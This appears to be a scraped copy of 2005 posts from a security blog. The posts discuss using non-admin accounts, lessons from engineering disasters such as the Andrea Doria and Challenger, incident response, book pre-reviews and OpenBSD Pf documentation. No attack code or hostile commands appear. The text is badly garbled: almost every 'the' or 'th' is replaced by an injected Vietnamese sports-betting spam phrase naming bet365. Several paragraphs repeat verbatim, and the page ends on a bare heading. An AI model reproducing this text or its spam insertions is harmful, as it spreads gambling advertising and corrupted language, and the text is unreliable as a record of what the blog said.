The book suffers one major flaw that robbed a star from my rating. The single most important defensive measure a home user can take is to not perform daily operations as a user with administrative privileges. Home users should not browse cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Web, read email, chat in IM, write documents, or do much anything else using an admin account. Users should only assume admin level power when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y need to install software or authorized Active X controls. This single defensive measure is not mentioned by TSGTHIS, but it has protected numerous customers and my family from thousands of client-side attacks.
More on Engineering Disasters and Bird Flu
Here's anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r anecdote from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Engineering Disasters story I wrote about recently. In 1956 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cruise ship Andrea Doria was struck and sunk by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ocean liner Stockholm. At that time radar was still a fairly new innovation on sea vessels. Ship bridges were dimly lit, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 controls on radar systems were not illuminated. It is possible that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Stockholm radar operators misinterpreted cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 readings on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir equipment, believing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Andrea Doria was 12 miles away when it was really 2 miles away. The ships literally turned towards one anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r on a collision course, based on faulty interpretation of radar contact in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 dense fog. Catastrophe ensued.
This disaster shows how humans can never be removed from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 equation, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are often at center stage when failures occur. The commentator on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 show said a 10 cent ligh bulb illuminating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 radar controls station could have shown cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 radar range was positioned in a setting different from that assumed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 operator. Following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Andrea Doria collision, illumintation was added to ship radar controls. This story reminded me that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest security technology is worthless -- or even worse, damaging -- in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hands of people who are not trained or able to use it properly.
On a different subject, I heard an interview on NPR with Health and Human Services Secretary Mike Leavitt about bird flu. He likened cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 situation to "surveillance" of a dry forest during fire season. He said that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best defense was vigilance and rapid response. His analogy assumed being nearby when a small fire erupts. First responders who are quickly on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scene can stamp out a fire before it becomes uncontrollable. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response team is unaware of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fire, it can spread and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n be beyond containment. He concluded cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 interview saying "ultimately, anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r pandemic will come. Right now we are not prepared."
I thought his comments applied well to digital security incidents. NSM is surveillance, and incident response helps stamp out fires (or bird flu outbreaks) quickly before cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y exceed an organization's capacity to deal with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. Is your organization ready? If you want to know, TaoSecurity provides services like incident response training and CSIRT assessments and evaluations.
This disaster shows how humans can never be removed from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 equation, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are often at center stage when failures occur. The commentator on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 show said a 10 cent ligh bulb illuminating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 radar controls station could have shown cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 radar range was positioned in a setting different from that assumed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 operator. Following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Andrea Doria collision, illumintation was added to ship radar controls. This story reminded me that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest security technology is worthless -- or even worse, damaging -- in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hands of people who are not trained or able to use it properly.
On a different subject, I heard an interview on NPR with Health and Human Services Secretary Mike Leavitt about bird flu. He likened cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 situation to "surveillance" of a dry forest during fire season. He said that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best defense was vigilance and rapid response. His analogy assumed being nearby when a small fire erupts. First responders who are quickly on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scene can stamp out a fire before it becomes uncontrollable. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response team is unaware of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fire, it can spread and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n be beyond containment. He concluded cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 interview saying "ultimately, anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r pandemic will come. Right now we are not prepared."
I thought his comments applied well to digital security incidents. NSM is surveillance, and incident response helps stamp out fires (or bird flu outbreaks) quickly before cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y exceed an organization's capacity to deal with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. Is your organization ready? If you want to know, TaoSecurity provides services like incident response training and CSIRT assessments and evaluations.
Pre-Review Postscript
I neglected to mention a book I look forward to reading -- Essential SNMP, 2nd Ed by Douglas Mauro and Kevin Schmidt. Most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technologies I deploy and use are passive monitoring systems. This book represents an active monitoring system, where SNMP is used to determine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 status of network resources. I expect Wolfgang Barth's book on Nagios to also be helpful.
Since mentioning cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new Apress MySQL book yesterday, MySQL 5 is achieved general availability status with version 5.0.15. I expect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FreeBSD port will be updated shortly.
Bejtlich Speaking at RSA Conference 2006
My proposal to speak at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RSA Conference 2006 was accepted out of 1500+ submissions. I will present in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject is Traffic-Centric Incident Response and Forensics.
Sunday, October 23, 2005
Latest Book Pre-Reviews
During cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last two months my work for TaoSecurity has kept me too busy to read and review books. I am trying to get back on track. Here are pre-reviews for books I have received over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last several weeks. First are two books I intend to keep as reference, but which I don't plan to read cover-to-cover. Hence, I won't review cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for Amazon.com.
First is Cisco IOS in a Nutshell, 2nd Ed by James Boney. I put this book next to my copy of O'Reilly's UNIX in a Nutshell, 3rd Ed. This book looks like an excellent reference for Cisco admins and anyone pursuing an advanced Cisco certification (beyond cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CCNA). I may read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first 350 pages, as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chapters in that half of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book each address a topic of interest, like IP routing or QoS. The last half of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book is a command syntax reference.
Windows Server 2003 Network Administration by Craig Hunt and Roberta Bragg is sitting in my reference section next to O'Reilly's Learning Windows Server 2003 and Windows Server Cookbook. The book appears to be a comprehensive overview of networking services from a Microsoft perspective. Next I turn to books I plan to read and review.
Beginning Python by Magnus Lie Hetland is an update of his 2002 book Practical Python. I originally tried to learn Python by reading Learning Python, 2nd Ed in early 2004, but I bailed on that book after a few chapters. I am really excited to try again with Magnus' book. I consider it to be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 gateway to a series of ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r excellent Apress Python books like Dive Into Python and Foundations of Python Network Programming, which I plan to read. (I hope O'Reilly's Python Cookbook, 2nd Ed will be a good addition to this trio.) I plan to read this book as part of my programming education, which will start once I clear cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 books which follow.
Ben Rothke sent me a copy of his updated book Computer Security 20 Things Every Employee Should Know, 2nd Ed. This is a booklet that would be appropriate as part of digital security awareness campaign in a company of any size. After skimming through it, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 advice seems sound and I would have no problem recommending cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book to clients.
The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer is Symantec's latest foray into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security publishing world. This is a fairly short book, which makes sense given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 level of interest and expertise of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intended audience. I would be pleased with it if I could imagine sending it to my parents -- maybe with a copy of FreeBSD? (Probably not!)
VMware Workstation 5 Handbook by Steven S. Warren is a new book from Charles River Media. I had this book on my Amazon.com Wish List for months before I bought a copy at a local Borders. A few days later cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 publisher shipped me one! They must have read my wish list. This book looks like a thorough and easy-to-read overview of Workstation features. With cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 introduction of Teams, Snapshots, Clones, and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r advances over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 3.x and 4.x lines, I look forward to learning how to make cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best use of VMware in my classes and in testing scenarios.
I have not abandoned plans for a TaoSecurity Podcast. I hope two books can give me advice on how best to proceed. The first I plan to read is Todd Cochrane's Podcasting: A Do-It-Yourself Guide, published by Wiley. This was one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first podcasting books to appear that got reasonable Amazon.com reviews. I hope to gain some insights on how best to create podcasts using minimal equipment.
Shortly after I received a copy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 previous book, I learned of Jack Herrington's Podcasting Hacks. The O'Reilly Hacks series usually contain lots of good advice, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 format is seldom read cover-to-cover. It's more an assortment of helpful tips and tools.
Three books from Syngress are next. First is Sarbanes-Oxley IT Compliance Using COBIT and Open Source Tools by Christian B. Lahti and Roderick Peterson. I will admit up front that I will bail on this book unless it hooks me. I am not a regulatory compliance person, but I would like to learn a little more about SOX and COBIT. I would like this book to provide cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 background I need to understand cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se issues.
Software Piracy Exposed by Paul Craig and Ron Honick will be good if it follows in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 footsteps of an earlier Syngress book, Inside cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Spam Cartel. I don't know much about modern software piracy, so I thought this book might provide a glimpse into that threat sector.
Nessus, Snort, & Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real Power Tools:
Customizing Open Source Security Applications by Brian Caswell, Gilbert Ramirez, Jay Beale, Noam Rathaus and Neil Archibald looks like a great book. The only existing review on Amazon.com (3 stars) complains "Very in-depth, however, not for someone who is just starting out on Snort, Nessus, or Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real. New to Snort, Nessus, or Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real - Buy something else." Does every book have to assume a newbie audience? Of course not -- state cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 prerequisite knowledge up front, and press on!
The Definitive Guide to MySQL 5, 3rd Ed by Michael Kofler looks like a great overview of features found in MySQL 5, which is currently a release candidate at version 5.0.13. The "generally available" version is 4.1.15, which is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 one people are most likely encouraged to use in production. Once MySQL 5 leaves RC status, I plan to incorporate it into my Sguil Installation Guide, along with FreeBSD 6.0 and Sguil 0.6.0. All three components should be ready within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next several weeks.
After years of no publications about Debian, this year has seen two books about that Linux distro. First was Wiley's Debian GNU/Linux 3.1 Bible by David B. Harris, Jaldhar Vyas. Now we have No Starch's The Debian System by Martin F. Krafft. I am much more willing to devote time to a new operating system when it is backed by books. Online documentation is fine, but a published book is something I can recommend to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs in a physical form. It carries much more weight (literally) than online documentation. I plan to evaluate how I might integrate Debian into my lab, although I already have it running on a PA-RISC box that normally hosts HP-UX.
Finally we arrive at Security and Usability, a collection of essays edited by Lorrie Faith Cranor and Simson Garfinkel. I think this is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sort of book I might read on a cross-US flight. I am not a big fan of collections of essays, but in a captive environment (i.e., stuck on a plane) I might find sanctuary in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ideas contained in this book.
So that's a ton of new books. My personal reading list currently shows 24 non-programming and 24 programming books on my bookshelf. That does not count reference books that I have pre-reviewed but do not plan to read cover-to-cover. My Amazon.com Wish List shows anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r 21 books on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 horizon that appear interesting. Since I do not have any new major writing projects planned for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next year, I would like to make progress on all of this reading. Stay tuned to my Amazon.com Reviews as I read and review cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 titles seen here and elsewhere. Thank you!
Saturday, October 22, 2005
Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Thoughts on Engineering Disasters
My TiVo managed to save a few more episodes of Modern Marvels. You may remember I discussed engineering disasters last month. This episode of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 show of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same title took a broader look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem. Three experts provided comments that resonated with me.
First, Dr. Roger McCarthy of Exponent, Inc. offered cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following story about problems with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Hubble Space Telescope. When Hubble was built on earth, engineers did not sufficiently address issues with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weight of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lens on Earth and deflections caused by gravity. When Hubble was put in orbit, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lens no longer deflected and as a result it was not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 proper shape. Engineers on Earth had never tested cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lens because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y could not figure out a way to do it.
So, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y launched and hoped for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best -- only to encounter a disaster that required a $50 million orbital repair mission. Dr. McCarthy's comment was "A single test is worth a thousand expert opinions." This is an example of management by fact instead of management by belief, mentioned previously on this blog.
Second, Dr. Charles Perrow, author of Normal Accidents: Living With High-Risk Technologies, explained cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 makings of a disaster. Essentially, he said disasters are caused by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 unforeseen consequences of multiple, individually non-devastating, failures in complex systems. Most catastrophes could be prevented if any one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 small failures had not occurred. Third, Mary Schiavo commented on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Challenger disaster. She described cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 well-known problems with operating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Shuttle's rocket O-rings in temperatures below 53 degrees F. The Shuttle had launched at lower temperatures prior to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Challenger explosion, but NASA knew cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were risking catastrophe. Ms. Schiavo said NASA engineers begged cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir managers not to let Challenger launch, seeing that chunks of ice covered cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 launch pad and Shuttle. They were overruled and disaster occurred.
This struck a chord with me, because a few days earlier I read a new story in Time about how Steve Jobs gets Apple to bring innovative products to market:
Apple CEO Steve Jobs [will] tell you an instructive little story. Call it cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Parable of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Concept Car. "Here's what you find at a lot of companies," he says, kicking back in a conference room at Apple's gleaming white Silicon Valley headquarters, which looks something like a cross between an Ivy League university and an iPod. "You know how you see a show car, and it's really cool, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n four years later you see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 production car, and it sucks? And you go, What happened? They had it! They had it in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 palm of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir hands! They grabbed defeat from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 jaws of victory!
"What happened was, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 designers came up with this really great idea. Then cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y take it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 engineers, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 engineers go, 'Nah, we can't do that. That's impossible.' And so it gets a lot worse. Then cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y take it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 manufacturing people, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y go, 'We can't build that!' And it gets a lot worse."
When Jobs took up his present position at Apple in 1997, that's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 situation he found. He and Jonathan Ive, head of design, came up with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 original iMac, a candy-colored computer merged with a cathode-ray tube that, at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time, looked like nothing anybody had seen outside of a Jetsons cartoon. "Sure enough," Jobs recalls, "when we took it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 engineers, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y said, 'Oh.' And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y came up with 38 reasons. And I said, 'No, no, we're doing this.' And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y said, 'Well, why?' And I said, 'Because I'm cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CEO, and I think it can be done.'"
Would Steve Jobs have overruled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NASA engineers and launched Challenger? Who knows.
From what I have learned, disasters are prone to happen in complex, tightly-coupled systems. The only way to try to avoid cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m is to test and monitor cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir operation, exercise response, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n implement those plans when catastrophe occurs. Anything less is like launching a defective, untested Hubble and hoping for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n paying through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 nose to clean up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mess.
Here are a few footnotes to this post. Dr. McCarthy's company offers security engineering services, including services for information systems. They are described thus: "We have assembled one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 largest private collections of computerized accident and incident data in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world. Our web-based solutions put this information at your disposal, giving you comprehensive risk data quickly and at low cost." Dr. McCarthy was recently elected to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 National Academy of Engineering, which has a Computer Science and Telecommunications Board with a Improving Cybersecurity Research in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 United States project. My research for this story also led me to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 System Safety Society.
First, Dr. Roger McCarthy of Exponent, Inc. offered cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following story about problems with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Hubble Space Telescope. When Hubble was built on earth, engineers did not sufficiently address issues with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weight of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lens on Earth and deflections caused by gravity. When Hubble was put in orbit, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lens no longer deflected and as a result it was not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 proper shape. Engineers on Earth had never tested cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lens because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y could not figure out a way to do it.
So, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y launched and hoped for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best -- only to encounter a disaster that required a $50 million orbital repair mission. Dr. McCarthy's comment was "A single test is worth a thousand expert opinions." This is an example of management by fact instead of management by belief, mentioned previously on this blog.
Second, Dr. Charles Perrow, author of Normal Accidents: Living With High-Risk Technologies, explained cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 makings of a disaster. Essentially, he said disasters are caused by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 unforeseen consequences of multiple, individually non-devastating, failures in complex systems. Most catastrophes could be prevented if any one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 small failures had not occurred. Third, Mary Schiavo commented on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Challenger disaster. She described cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 well-known problems with operating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Shuttle's rocket O-rings in temperatures below 53 degrees F. The Shuttle had launched at lower temperatures prior to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Challenger explosion, but NASA knew cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were risking catastrophe. Ms. Schiavo said NASA engineers begged cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir managers not to let Challenger launch, seeing that chunks of ice covered cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 launch pad and Shuttle. They were overruled and disaster occurred.
This struck a chord with me, because a few days earlier I read a new story in Time about how Steve Jobs gets Apple to bring innovative products to market:
Apple CEO Steve Jobs [will] tell you an instructive little story. Call it cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Parable of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Concept Car. "Here's what you find at a lot of companies," he says, kicking back in a conference room at Apple's gleaming white Silicon Valley headquarters, which looks something like a cross between an Ivy League university and an iPod. "You know how you see a show car, and it's really cool, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n four years later you see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 production car, and it sucks? And you go, What happened? They had it! They had it in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 palm of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir hands! They grabbed defeat from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 jaws of victory!
"What happened was, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 designers came up with this really great idea. Then cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y take it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 engineers, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 engineers go, 'Nah, we can't do that. That's impossible.' And so it gets a lot worse. Then cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y take it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 manufacturing people, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y go, 'We can't build that!' And it gets a lot worse."
When Jobs took up his present position at Apple in 1997, that's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 situation he found. He and Jonathan Ive, head of design, came up with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 original iMac, a candy-colored computer merged with a cathode-ray tube that, at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time, looked like nothing anybody had seen outside of a Jetsons cartoon. "Sure enough," Jobs recalls, "when we took it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 engineers, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y said, 'Oh.' And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y came up with 38 reasons. And I said, 'No, no, we're doing this.' And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y said, 'Well, why?' And I said, 'Because I'm cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CEO, and I think it can be done.'"
Would Steve Jobs have overruled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NASA engineers and launched Challenger? Who knows.
From what I have learned, disasters are prone to happen in complex, tightly-coupled systems. The only way to try to avoid cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m is to test and monitor cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir operation, exercise response, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n implement those plans when catastrophe occurs. Anything less is like launching a defective, untested Hubble and hoping for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n paying through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 nose to clean up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mess.
Here are a few footnotes to this post. Dr. McCarthy's company offers security engineering services, including services for information systems. They are described thus: "We have assembled one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 largest private collections of computerized accident and incident data in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world. Our web-based solutions put this information at your disposal, giving you comprehensive risk data quickly and at low cost." Dr. McCarthy was recently elected to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 National Academy of Engineering, which has a Computer Science and Telecommunications Board with a Improving Cybersecurity Research in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 United States project. My research for this story also led me to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 System Safety Society.
Excellent Pf Documentation
I recently learned of Peter N. M. Hansteen's document Firewalling with OpenBSD's PF packet filter. I really like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 approach Peter takes to describing Pf. He explains enabling Pf on OpenBSD, FreeBSD, and NetBSD, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n builds up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capabilities one can employ using Pf. I recommend anyone who wants to learn more about Pf start with Peter's document.
Incidentally, OpenBSD 3.8 will be available at a FTP server near you on 1 November.
Incidentally, OpenBSD 3.8 will be available at a FTP server near you on 1 November.
The Coming Snort Worm
